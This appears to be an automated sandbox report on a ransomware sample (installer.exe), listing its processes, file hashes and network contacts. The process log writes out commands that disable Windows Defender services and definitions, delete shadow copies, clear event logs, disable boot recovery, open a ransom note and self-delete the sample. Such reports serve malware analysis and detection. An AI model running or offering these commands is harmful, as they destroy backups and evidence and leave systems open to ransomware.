reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\installer.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 8f68b6820eee08212f7c3d286720a73d |
| SHA1 | 244247fa3c39d764b091cfd1bbabafc1286e6c85 |
| SHA256 | 6cf01622d3007b796c4695d740919203e0cb5c03eb400290aabee7480cebb278 |
| SHA512 | fd01b034c1335d705a5162908f2f1cf29494b9784d342a649cc578db7cfdcc2ad7c47869d08d6ce012db67bb30b4c4203952055cac204a8eeb5b157666cf0a8c |
C:\rFSH_HOW_TO_DECRYPT.txt
| MD5 | 9feb836dd50f68cbf9e87dad21a2fbc4 |
| SHA1 | f995609d7ea8a22383c8f28e2ac9b657fa767019 |
| SHA256 | 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e |
| SHA512 | 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-05 07:36
Reported
2022-01-05 07:38
Platform
win10-en-20211208
Max time kernel
1s
Max time network
127s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 52.109.8.21:443 |  | tcp |